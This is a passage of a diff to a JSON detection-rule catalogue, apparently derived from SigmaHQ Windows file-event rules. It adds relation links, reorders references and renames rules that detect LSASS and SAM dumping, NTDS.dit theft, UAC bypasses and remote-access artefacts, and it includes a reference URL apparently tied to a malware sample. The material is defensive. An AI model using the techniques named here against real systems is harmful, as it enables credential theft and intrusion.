"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_cve_2021_41379_msi_lpe.yml" ], "tags": [ @@ -25562,6 +32403,15 @@ "attack.t1068" ] }, + "related": [ + { + "dest-uuid": "b21c3b2d-02e6-45b1-980b-e69051040839", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "3be82d5d-09fe-4d6a-a275-0d40d234d324", "value": "InstallerFileTakeOver LPE CVE-2021-41379 File Create Event" }, @@ -25590,20 +32440,22 @@ "value": "Mimikatz Kirbi File Creation" }, { - "description": "Detects the creation of Usage Log files by the CLR (clr.dll). These files are named after the executing process once the assembly is finished executing for the first time in the (user) session context", + "description": "Detects the creation of Usage Log files by the CLR (clr.dll). These files are named after the executing process once the assembly is finished executing for the first time in the (user) session context.", "meta": { - "author": "frack113", + "author": "frack113, omkar72, oscd.community, Wojciech Lesicki", "creation_date": "2022/11/18", "falsepositive": [ - "Legitimate use" + "Rundll32.exe with zzzzInvokeManagedCustomActionOutOfProc in command line and msiexec.exe as parent process - https://twitter.com/SBousseaden/status/1388064061087260675" ], "filename": "file_event_win_net_cli_artefact.yml", - "level": "medium", + "level": "high", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ - "https://github.com/olafhartong/sysmon-modular/blob/fa1ae53132403d262be2bbd7f17ceea7e15e8c78/11_file_create/include_dotnet.xml", "https://bohops.com/2021/03/16/investigating-net-clr-usage-log-tampering-techniques-for-edr-evasion/", + "https://web.archive.org/web/20221026202428/https://gist.github.com/code-scrap/d7f152ffcdb3e0b02f7f394f5187f008", + "https://blog.menasec.net/2019/07/interesting-difr-traces-of-net-clr.html", + "https://github.com/olafhartong/sysmon-modular/blob/fa1ae53132403d262be2bbd7f17ceea7e15e8c78/11_file_create/include_dotnet.xml", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_net_cli_artefact.yml" ], "tags": [ @@ -25611,6 +32463,15 @@ "attack.t1218" ] }, + "related": [ + { + "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "e0b06658-7d1d-4cd3-bf15-03467507ff7c", "value": "NET CLR Binary Execution Usage Log Artifact" }, @@ -25627,8 +32488,8 @@ "logsource.category": "file_event", "logsource.product": "windows", "refs": [ - "https://twitter.com/splinter_code/status/1519075134296006662?s=12&t=DLUXH86WtcmG_AZ5gY3C6g", "https://twitter.com/orange_8361/status/1518970259868626944?s=20&t=RFXqZjtA7tWM3HxqEH78Aw", + "https://twitter.com/splinter_code/status/1519075134296006662?s=12&t=DLUXH86WtcmG_AZ5gY3C6g", "https://lolbas-project.github.io/lolbas/Binaries/Eventvwr/#execute", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_uac_bypass_eventvwr.yml" ], @@ -25653,9 +32514,9 @@ "logsource.category": "file_event", "logsource.product": "windows", "refs": [ - "https://www.gteltsc.vn/blog/canh-bao-chien-dich-tan-cong-su-dung-lo-hong-zero-day-tren-microsoft-exchange-server-12714.html", "https://www.microsoft.com/security/blog/2022/09/30/analyzing-attacks-using-the-exchange-vulnerabilities-cve-2022-41040-and-cve-2022-41082/", "https://en.gteltsc.vn/blog/cap-nhat-nhe-ve-lo-hong-bao-mat-0day-microsoft-exchange-dang-duoc-su-dung-de-tan-cong-cac-to-chuc-tai-viet-nam-9685.html", + "https://www.gteltsc.vn/blog/canh-bao-chien-dich-tan-cong-su-dung-lo-hong-zero-day-tren-microsoft-exchange-server-12714.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_exchange_webshell_drop.yml" ], "tags": [ @@ -25677,8 +32538,8 @@ "logsource.category": "file_event", "logsource.product": "windows", "refs": [ - "https://www.hybrid-analysis.com/sample/ba86fa0d4b6af2db0656a88b1dd29f36fe362473ae8ad04255c4e52f214a541c?environmentId=100", "https://www.first.org/resources/papers/conf2017/Advanced-Incident-Detection-and-Threat-Hunting-using-Sysmon-and-Splunk.pdf", + "https://www.hybrid-analysis.com/sample/ba86fa0d4b6af2db0656a88b1dd29f36fe362473ae8ad04255c4e52f214a541c?environmentId=100", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_mal_adwind.yml" ], "tags": [ @@ -25687,6 +32548,22 @@ "attack.t1059.007" ] }, + "related": [ + { + "dest-uuid": "dfd7cc1d-e1d8-4394-a198-97c4cab8aa67", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "0f4a0c76-ab2d-4cb0-85d3-3f0efb8cba0d", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "0bcfabcb-7929-47f4-93d6-b33fb67d34d1", "value": "Adwind RAT / JRAT File Artifact" }, @@ -25711,6 +32588,15 @@ "attack.t1137.003" ] }, + "related": [ + { + "dest-uuid": "a9e2cea0-c805-4bf8-9e31-f5f0513a3634", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "c3edc6a5-d9d4-48d8-930e-aab518390917", "value": "Outlook Form Installation" }, @@ -25727,8 +32613,8 @@ "logsource.category": "file_event", "logsource.product": "windows", "refs": [ - "https://media.defcon.org/DEF%20CON%2030/DEF%20CON%2030%20presentations/Asaf%20Gilboa%20-%20LSASS%20Shtinkering%20Abusing%20Windows%20Error%20Reporting%20to%20Dump%20LSASS.pdf", "https://github.com/deepinstinct/Lsass-Shtinkering", + "https://media.defcon.org/DEF%20CON%2030/DEF%20CON%2030%20presentations/Asaf%20Gilboa%20-%20LSASS%20Shtinkering%20Abusing%20Windows%20Error%20Reporting%20to%20Dump%20LSASS.pdf", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_lsass_shtinkering.yml" ], "tags": [ @@ -25736,6 +32622,15 @@ "attack.t1003.001" ] }, + "related": [ + { + "dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "6902955a-01b7-432c-b32a-6f5f81d8f625", "value": "LSASS Process Dump Artefact In CrashDumps Folder" }, @@ -25761,8 +32656,17 @@ "attack.t1003" ] }, + "related": [ + { + "dest-uuid": "0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "6e2a900a-ced9-4e4a-a9c2-13e706f9518a", - "value": "Remote Credential Dump" + "value": "Potential Remote Credential Dumping Activity" }, { "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)\n", @@ -25785,6 +32689,15 @@ "attack.t1219" ] }, + "related": [ + { + "dest-uuid": "4061e78c-1284-44b4-9116-73e4ac3912f7", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "0b9ad457-2554-44c1-82c2-d56a99c42377", "value": "Anydesk Temporary Artefact" }, @@ -25809,6 +32722,15 @@ "attack.t1047" ] }, + "related": [ + { + "dest-uuid": "01a5a209-b94c-450b-b7f9-946497d91055", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "8d5aca11-22b3-4f22-b7ba-90e60533e1fb", "value": "Wmiexec Default Output File" }, @@ -25858,6 +32780,15 @@ "attack.t1546.002" ] }, + "related": [ + { + "dest-uuid": "ce4b7013-640e-48a9-b501-d0025a95f4bf", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "97aa2e88-555c-450d-85a6-229bcd87efb8", "value": "Suspicious Screensaver Binary File Creation" }, @@ -25900,8 +32831,8 @@ "logsource.category": "file_event", "logsource.product": "windows", "refs": [ - "https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/", "https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/02bcbfc2bfb8b4da601bb30de0344ae453aa1afe/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml", + "https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_script_creation_by_office_using_file_ext.yml" ], "tags": [ @@ -25909,6 +32840,15 @@ "attack.execution" ] }, + "related": [ + { + "dest-uuid": "232b7f21-adf9-4b42-b936-b9d6f7df856e", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "c7a74c80-ba5a-486e-9974-ab9e682bc5e4", "value": "Created Files by Office Applications" }, @@ -25933,6 +32873,15 @@ "attack.t1027.004" ] }, + "related": [ + { + "dest-uuid": "c726e0a2-a57a-4b7b-a973-d0f013246617", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "e4a74e34-ecde-4aab-b2fb-9112dd01aed0", "value": "Dynamic C Sharp Compile Artefact" }, @@ -25942,7 +32891,7 @@ "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "creation_date": "2020/05/02", "falsepositive": [ - "An FP could be caused by legitimate application writing shortcuts for example. This folder should always be inspected to make sure that all the files in there are legitimate" + "FP could be caused by legitimate application writing shortcuts for example. This folder should always be inspected to make sure that all the files in there are legitimate" ], "filename": "file_event_win_startup_folder_file_write.yml", "level": "medium", @@ -25983,6 +32932,15 @@ "attack.t1548.002" ] }, + "related": [ + { + "dest-uuid": "120d5519-3098-4e1c-9191-2aa61232f073", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "7fff6773-2baa-46de-a24a-b6eec1aba2d1", "value": "UAC Bypass Using NTFS Reparse Point - File" }, @@ -25999,8 +32957,8 @@ "logsource.category": "file_event", "logsource.product": "windows", "refs": [ - "https://www.n00py.io/2022/03/manipulating-user-passwords-without-mimikatz/", "https://www.ired.team/offensive-security/credential-access-and-credential-dumping/ntds.dit-enumeration", + "https://www.n00py.io/2022/03/manipulating-user-passwords-without-mimikatz/", "https://github.com/samratashok/nishang/blob/414ee1104526d7057f9adaeee196d91ae447283e/Gather/Copy-VSS.ps1", "https://pentestlab.blog/tag/ntds-dit/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_ntds_dit.yml" @@ -26010,6 +32968,15 @@ "attack.t1003.003" ] }, + "related": [ + { + "dest-uuid": "edf91964-b26e-4b4a-9600-ccacd7d7df24", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "4e7050dd-e548-483f-b7d6-527ab4fa784d", "value": "Suspicious NTDS.DIT Creation" }, @@ -26026,9 +32993,9 @@ "logsource.category": "file_event", "logsource.product": "windows", "refs": [ - "https://github.com/SecureAuthCorp/impacket/blob/7d2991d78836b376452ca58b3d14daa61b67cb40/impacket/examples/secretsdump.py#L2405", "https://github.com/rapid7/metasploit-framework/blob/eb6535009f5fdafa954525687f09294918b5398d/modules/post/windows/gather/ntds_grabber.rb", "https://github.com/rapid7/metasploit-framework/blob/eb6535009f5fdafa954525687f09294918b5398d/data/post/powershell/NTDSgrab.ps1", + "https://github.com/SecureAuthCorp/impacket/blob/7d2991d78836b376452ca58b3d14daa61b67cb40/impacket/examples/secretsdump.py#L2405", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_ntds_exfil_tools.yml" ], "tags": [ @@ -26036,6 +33003,15 @@ "attack.t1003.003" ] }, + "related": [ + { + "dest-uuid": "edf91964-b26e-4b4a-9600-ccacd7d7df24", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "3a8da4e0-36c1-40d2-8b29-b3e890d5172a", "value": "Suspicious NTDS Exfil Filename Patterns" }, @@ -26061,6 +33037,15 @@ "attack.t1003.001" ] }, + "related": [ + { + "dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "e074832a-eada-4fd7-94a1-10642b130e16", "value": "SafetyKatz Default Dump Filename" }, @@ -26077,8 +33062,8 @@ "logsource.category": "file_event", "logsource.product": "windows", "refs": [ - "https://twitter.com/RonnyTNL/status/1436334640617373699?s=20", "https://twitter.com/vanitasnk/status/1437329511142420483?s=21", + "https://twitter.com/RonnyTNL/status/1436334640617373699?s=20", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_winword_cve_2021_40444.yml" ], "tags": [ @@ -26086,6 +33071,15 @@ "attack.t1587" ] }, + "related": [ + { + "dest-uuid": "edadea33-549c-4ed1-9783-8f5a5853cbdf", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "60c0a111-787a-4e8a-9262-ee485f3ef9d5", "value": "Suspicious Word Cab File Write CVE-2021-40444" }, @@ -26134,6 +33128,15 @@ "attack.t1548.002" ] }, + "related": [ + { + "dest-uuid": "120d5519-3098-4e1c-9191-2aa61232f073", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "48ea844d-19b1-4642-944e-fe39c2cc1fec", "value": "UAC Bypass Using IDiagnostic Profile - File" }, @@ -26159,6 +33162,15 @@ "attack.t1105" ] }, + "related": [ + { + "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "fc4f4817-0c53-4683-a4ee-b17a64bc1039", "value": "Suspicious Desktopimgdownldr Target File" }, @@ -26184,6 +33196,15 @@ "attack.t1548.002" ] }, + "related": [ + { + "dest-uuid": "120d5519-3098-4e1c-9191-2aa61232f073", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "62ed5b55-f991-406a-85d9-e8e8fdf18789", "value": "UAC Bypass Using Consent and Comctl32 - File" }, @@ -26200,11 +33221,11 @@ "logsource.category": "file_event", "logsource.product": "windows", "refs": [ - "https://github.com/cube0x0/CVE-2021-36934", - "https://www.google.com/search?q=%22reg.exe+save%22+sam", "https://github.com/HuskyHacks/ShadowSteal", - "https://github.com/search?q=CVE-2021-36934", "https://github.com/FireFart/hivenightmare", + "https://github.com/cube0x0/CVE-2021-36934", + "https://github.com/search?q=CVE-2021-36934", + "https://www.google.com/search?q=%22reg.exe+save%22+sam", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_sam_dump.yml" ], "tags": [ @@ -26212,36 +33233,17 @@ "attack.t1003.002" ] }, + "related": [ + { + "dest-uuid": "1644e709-12d2-41e5-a60f-3470991f5011", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "4e87b8e2-2ee9-4b2a-a715-4727d297ece0", - "value": "SAM Dump File Creation" - }, - { - "description": "Detects suspicious .NET assembly executions. Could detect using Cobalt Strike's command execute-assembly.", - "meta": { - "author": "omkar72, oscd.community, Wojciech Lesicki", - "creation_date": "2020/10/12", - "falsepositive": [ - "Rundll32.exe with zzzzInvokeManagedCustomActionOutOfProc in command line and msiexec.exe as parent process - https://twitter.com/SBousseaden/status/1388064061087260675" - ], - "filename": "file_event_win_susp_clr_logs.yml", - "level": "high", - "logsource.category": "file_event", - "logsource.product": "windows", - "refs": [ - "https://blog.menasec.net/2019/07/interesting-difr-traces-of-net-clr.html", - "https://github.com/olafhartong/sysmon-modular/blob/5e5f6d90819a7f35eec0aba08021d0d201bb9055/11_file_create/include_dotnet.xml", - "https://bohops.com/2021/03/16/investigating-net-clr-usage-log-tampering-techniques-for-edr-evasion/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_clr_logs.yml" - ], - "tags": [ - "attack.execution", - "attack.defense_evasion", - "attack.t1059.001", - "attack.t1218" - ] - }, - "uuid": "e4b63079-6198-405c-abd7-3fe8b0ce3263", - "value": "Suspicious CLR Logs Creation" + "value": "Potential SAM Database Dump" }, { "description": "Detects the use of Moriya rootkit as described in the securelist's Operation TunnelSnake report", @@ -26290,6 +33292,15 @@ "attack.t1548.002" ] }, + "related": [ + { + "dest-uuid": "120d5519-3098-4e1c-9191-2aa61232f073", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "41bb431f-56d8-4691-bb56-ed34e390906f", "value": "UAC Bypass Using MSConfig Token Modification - File" }, @@ -26339,6 +33350,15 @@ "attack.t1562.002" ] }, + "related": [ + { + "dest-uuid": "4eb28bed-d11a-4641-9863-c2ac017d910a", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "65236ec7-ace0-4f0c-82fd-737b04fd4dcb", "value": "EVTX Created In Uncommon Location" }, @@ -26355,10 +33375,10 @@ "logsource.category": "file_event", "logsource.product": "windows", "refs": [ - "https://github.com/WiredPulse/Invoke-HiveNightmare", - "https://github.com/FireFart/hivenightmare/", - "https://github.com/GossiTheDog/HiveNightmare", "https://twitter.com/cube0x0/status/1418920190759378944", + "https://github.com/GossiTheDog/HiveNightmare", + "https://github.com/FireFart/hivenightmare/", + "https://github.com/WiredPulse/Invoke-HiveNightmare", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_hivenightmare_file_exports.yml" ], "tags": [ @@ -26392,6 +33412,15 @@ "attack.t1548.002" ] }, + "related": [ + { + "dest-uuid": "120d5519-3098-4e1c-9191-2aa61232f073", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "155dbf56-e0a4-4dd0-8905-8a98705045e8", "value": "UAC Bypass Abusing Winsat Path Parsing - File" }, @@ -26416,6 +33445,15 @@ "attack.t1003.002" ] }, + "related": [ + { + "dest-uuid": "1644e709-12d2-41e5-a60f-3470991f5011", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "847def9e-924d-4e90-b7c4-5f581395a2b4", "value": "QuarksPwDump Dump File" }, @@ -26432,9 +33470,9 @@ "logsource.category": "file_event", "logsource.product": "windows", "refs": [ + "https://www.kaspersky.com/blog/lazarus-vhd-ransomware/36559/", "https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/", "https://redcanary.com/blog/intelligence-insights-october-2021/", - "https://www.kaspersky.com/blog/lazarus-vhd-ransomware/36559/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_mal_vhd_download.yml" ], "tags": [ @@ -26442,6 +33480,15 @@ "attack.t1587.001" ] }, + "related": [ + { + "dest-uuid": "212306d8-efa4-44c9-8c2d-ed3d2e224aa0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "8468111a-ef07-4654-903b-b863a80bbc95", "value": "Suspicious VHD Image Download From Browser" }, @@ -26467,6 +33514,15 @@ "attack.t1548.002" ] }, + "related": [ + { + "dest-uuid": "120d5519-3098-4e1c-9191-2aa61232f073", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "bdd8157d-8e85-4397-bb82-f06cc9c71dbb", "value": "UAC Bypass Using IEInstal - File" }, @@ -26491,6 +33547,15 @@ "attack.t1219" ] }, + "related": [ + { + "dest-uuid": "4061e78c-1284-44b4-9116-73e4ac3912f7", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "fec96f39-988b-4586-b746-b93d59fd1922", "value": "ScreenConnect Temporary Installation Artefact" }, @@ -26520,6 +33585,15 @@ "attack.defense_evasion" ] }, + "related": [ + { + "dest-uuid": "aedfca76-3b30-4866-b2aa-0f1d7fd1e4b6", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "dbbd9f66-2ed3-4ca2-98a4-6ea985dd1a1c", "value": "Potential Initial Access via DLL Search Order Hijacking" }, @@ -26544,6 +33618,15 @@ "attack.t1564" ] }, + "related": [ + { + "dest-uuid": "22905430-4901-4c2a-84f6-98243cb173f8", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "e15b518d-b4ce-4410-a9cd-501f23ce4a18", "value": "Suspicious Creation with Colorcpl" }, @@ -26567,6 +33650,15 @@ "attack.t1219" ] }, + "related": [ + { + "dest-uuid": "4061e78c-1284-44b4-9116-73e4ac3912f7", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "52753ea4-b3a0-4365-910d-36cff487b789", "value": "Hijack Legit RDP Session to Move Laterally" }, @@ -26592,7 +33684,7 @@ ] }, "uuid": "54127bd4-f541-4ac3-afdb-ea073f63f692", - "value": "Persistence Via Notepad++ Plugins" + "value": "Potential Persistence Via Notepad++ Plugins" }, { "description": "Detects windows executables that writes files with suspicious extensions", @@ -26637,6 +33729,15 @@ "attack.t1003.001" ] }, + "related": [ + { + "dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "5e3d3601-0662-4af0-b1d2-36a05e90c40a", "value": "LSASS Memory Dump File Creation" }, @@ -26653,10 +33754,10 @@ "logsource.category": "file_event", "logsource.product": "windows", "refs": [ - "https://www.microsoft.com/security/blog/2021/05/27/new-sophisticated-email-based-attack-from-nobelium/", "https://insights.sei.cmu.edu/blog/the-dangers-of-vhd-and-vhdx-files/", - "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/malicious-spam-campaign-uses-iso-image-files-to-deliver-lokibot-and-nanocore", "https://blog.emsisoft.com/en/32373/beware-new-wave-of-malware-spreads-via-iso-file-email-attachments/", + "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/malicious-spam-campaign-uses-iso-image-files-to-deliver-lokibot-and-nanocore", + "https://www.microsoft.com/security/blog/2021/05/27/new-sophisticated-email-based-attack-from-nobelium/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_iso_file_recent.yml" ], "tags": "No established tags" @@ -26686,6 +33787,15 @@ "cve.2022.24527" ] }, + "related": [ + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "e0a41412-c69a-446f-8e6e-0e6d7483dad7", "value": "CVE-2022-24527 Microsoft Connected Cache LPE" }, @@ -26738,6 +33848,15 @@ "attack.t1587.001" ] }, + "related": [ + { + "dest-uuid": "212306d8-efa4-44c9-8c2d-ed3d2e224aa0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "297afac9-5d02-4138-8c58-b977bac60556", "value": "Creation of an Executable by an Executable" }, @@ -26778,9 +33897,9 @@ "logsource.category": "file_event", "logsource.product": "windows", "refs": [ - "https://medium.com/@ivecodoe/detecting-ldapfragger-a-newly-released-cobalt-strike-beacon-using-ldap-for-c2-communication-c274a7f00961", - "https://github.com/fox-it/LDAPFragger", "https://blog.fox-it.com/2020/03/19/ldapfragger-command-and-control-over-ldap-attributes/", + "https://github.com/fox-it/LDAPFragger", + "https://medium.com/@ivecodoe/detecting-ldapfragger-a-newly-released-cobalt-strike-beacon-using-ldap-for-c2-communication-c274a7f00961", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_adsi_cache_usage.yml" ], "tags": [ @@ -26788,6 +33907,15 @@ "attack.command_and_control" ] }, + "related": [ + { + "dest-uuid": "c325b232-d5bc-4dde-a3ec-71f3db9e8adc", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "75bf09fa-1dd7-4d18-9af9-dd9e492562eb", "value": "Suspicious ADSI-Cache Usage By Unknown Tool" }, @@ -26804,8 +33932,8 @@ "logsource.category": "file_event", "logsource.product": "windows", "refs": [ - "https://twitter.com/Sam0x90/status/1552011547974696960", "https://securityaffairs.co/wordpress/133680/malware/dll-sideloading-spread-qakbot.html", + "https://twitter.com/Sam0x90/status/1552011547974696960", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_iso_file_mount.yml" ], "tags": [ @@ -26837,6 +33965,15 @@ "attack.t1216" ] }, + "related": [ + { + "dest-uuid": "f6fe9070-7a65-49ea-ae72-76292f42cebe", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "d353dac0-1b41-46c2-820c-d7d2561fc6ed", "value": "AWL Bypass with Winrm.vbs and Malicious WsmPty.xsl/WsmTxt.xsl - File" }, @@ -26912,6 +34049,15 @@ "attack.t1027" ] }, + "related": [ + { + "dest-uuid": "b6301b64-ef57-4cce-bb0b-77026f14a8db", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "0c3fac91-5627-46e8-a6a8-a0d7b9b8ae1b", "value": "Suspicious Get-Variable.exe Creation" }, @@ -26936,6 +34082,15 @@ "attack.t1003.001" ] }, + "related": [ + { + "dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "c3e76af5-4ce0-4a14-9c9a-25ceb8fda182", "value": "WerFault LSASS Process Memory Dump" }, @@ -26961,6 +34116,15 @@ "attack.t1528" ] }, + "related": [ + { + "dest-uuid": "890c9858-598c-401d-a4d5-c67ebcdd703a", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "6902955a-01b7-432c-b32a-6f5f81d8f624", "value": "Suspicious File Event With Teams Objects" }, @@ -26985,6 +34149,15 @@ "attack.t1546.002" ] }, + "related": [ + { + "dest-uuid": "ce4b7013-640e-48a9-b501-d0025a95f4bf", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "4aafb0fa-bff5-4b9d-b99e-8093e659c65f", "value": "Writing Local Admin Share" }, @@ -27009,6 +34182,15 @@ "attack.defense_evasion" ] }, + "related": [ + { + "dest-uuid": "045d0922-2310-4e60-b5e4-3302302cb3c5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "c048f047-7e2a-4888-b302-55f509d4a91d", "value": "SCR File Write Event" }, @@ -27033,6 +34215,15 @@ "attack.t1003.001" ] }, + "related": [ + { + "dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "9433ff9c-5d3f-4269-99f8-95fc826ea489", "value": "CrackMapExec File Creation Patterns" }, @@ -27057,6 +34248,15 @@ "attack.t1218" ] }, + "related": [ + { + "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "654fcc6d-840d-4844-9b07-2c3300e54a26", "value": "Legitimate Application Dropped Archive" }, @@ -27073,11 +34273,11 @@ "logsource.category": "file_event", "logsource.product": "windows", "refs": [ - "https://github.com/Wh04m1001/SysmonEoP", "https://www.hexacorn.com/blog/2013/12/08/beyond-good-ol-run-key-part-5/", - "https://clement.notin.org/blog/2020/09/12/CVE-2020-7315-McAfee-Agent-DLL-injection/", "https://posts.specterops.io/lateral-movement-scm-and-dll-hijacking-primer-d2f61e8ab992", "https://decoded.avast.io/martinchlumecky/png-steganography/", + "https://github.com/Wh04m1001/SysmonEoP", + "https://clement.notin.org/blog/2020/09/12/CVE-2020-7315-McAfee-Agent-DLL-injection/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_create_non_existent_dlls.yml" ], "tags": [ @@ -27114,6 +34314,15 @@ "attack.t1021.002" ] }, + "related": [ + { + "dest-uuid": "01a5a209-b94c-450b-b7f9-946497d91055", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "614a7e17-5643-4d89-b6fe-f9df1a79641c", "value": "Wmiprvse Wbemcomn DLL Hijack - File" }, @@ -27138,6 +34347,15 @@ "attack.t1218" ] }, + "related": [ + { + "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "7d604714-e071-49ff-8726-edeb95a70679", "value": "Legitimate Application Dropped Script" }, @@ -27155,6 +34373,8 @@ "logsource.product": "windows", "refs": [ "Malware Sandbox https://app.any.run/tasks/d6fe6624-6ef8-485d-aa75-3d1bdda2a08c/", + "http://addbalance.com/word/startup.htm", + 